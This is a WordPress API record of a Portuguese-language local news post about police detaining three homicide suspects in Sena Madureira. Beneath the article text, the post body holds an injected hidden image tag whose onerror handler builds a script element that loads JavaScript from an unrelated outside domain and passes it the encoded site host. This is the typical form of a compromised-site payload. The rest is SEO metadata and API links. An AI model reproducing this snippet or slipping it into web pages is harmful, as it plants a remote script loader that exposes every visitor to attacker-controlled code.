{"id":51973,"date":"2020-12-23T17:47:50","date_gmt":"2020-12-23T17:47:50","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/12\/23\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/"},"modified":"2020-12-23T17:47:50","modified_gmt":"2020-12-23T17:47:50","slug":"policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/","title":{"rendered":"PM e PC cumprem mandados de pris\u00e3o em Sena Madureira"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Homem e adolescentes s\u00e3o suspeitos de homic\u00eddio<\/span><\/p>\n<p style=\"text-align: justify;\">As pol\u00edcias civil e militar cumpriram dois mandados de interna\u00e7\u00e3o e um de pris\u00e3o na manh\u00e3 desta quarta-feira (23), no bairro Ana Vieira, em Sena Madureira.<\/p>\n<p>Foram detidos um homem e dois adolescentes suspeitos de um duplo homic\u00eddio, ocorrido na Rua Siqueira Campos.<\/p>\n<p style=\"text-align: justify;\">Todos foram levados \u00e0 delegacia para os procedimentos cab\u00edveis.<\/p>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\">What do you want to do ?<\/div>\n<p> <a id=\"janelamailtobuttonOpenEmailAppNew\">New mail<\/a><button id=\"janelamailtoclipboardButtonCopyEmail\">Copy<\/button><textarea id=\"janelamailtotoSelectClipboardCopyText\"><\/textarea><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Homem e adolescentes s\u00e3o suspeitos de homic\u00eddio<\/span><\/p>\n","protected":false},"author":4,"featured_media":51972,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-51973","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>PM e PC cumprem mandados de pris\u00e3o em Sena Madureira - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PM e PC cumprem mandados de pris\u00e3o em Sena Madureira - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Homem e adolescentes s\u00e3o suspeitos de homic\u00eddio\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-23T17:47:50+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_policias-civis-e-militares-cumprem-mandados-em-sena-madureira.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/\",\"name\":\"PM e PC cumprem mandados de pris\u00e3o em Sena Madureira - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_policias-civis-e-militares-cumprem-mandados-em-sena-madureira.jpeg\",\"datePublished\":\"2020-12-23T17:47:50+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_policias-civis-e-militares-cumprem-mandados-em-sena-madureira.jpeg\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_policias-civis-e-militares-cumprem-mandados-em-sena-madureira.jpeg\",\"width\":458,\"height\":340,\"caption\":\"23-12-2020 policias-civis-e-militares-cumprem-mandados-em-sena-madureira\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"PM e PC cumprem mandados de pris\u00e3o em Sena Madureira\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PM e PC cumprem mandados de pris\u00e3o em Sena Madureira - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/","og_locale":"pt_BR","og_type":"article","og_title":"PM e PC cumprem mandados de pris\u00e3o em Sena Madureira - Agazeta.net","og_description":"Homem e adolescentes s\u00e3o suspeitos de homic\u00eddio","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/","og_site_name":"Agazeta.net","article_published_time":"2020-12-23T17:47:50+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_policias-civis-e-militares-cumprem-mandados-em-sena-madureira.jpeg","type":"image\/jpeg"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/","name":"PM e PC cumprem mandados de pris\u00e3o em Sena Madureira - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_policias-civis-e-militares-cumprem-mandados-em-sena-madureira.jpeg","datePublished":"2020-12-23T17:47:50+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_policias-civis-e-militares-cumprem-mandados-em-sena-madureira.jpeg","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_policias-civis-e-militares-cumprem-mandados-em-sena-madureira.jpeg","width":458,"height":340,"caption":"23-12-2020 policias-civis-e-militares-cumprem-mandados-em-sena-madureira"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policias-civil-e-militar-cumprem-mandados-de-prisao-em-sena-madureira\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"PM e PC cumprem mandados de pris\u00e3o em Sena Madureira"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51973","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=51973"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51973\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/51972"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=51973"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=51973"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=51973"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}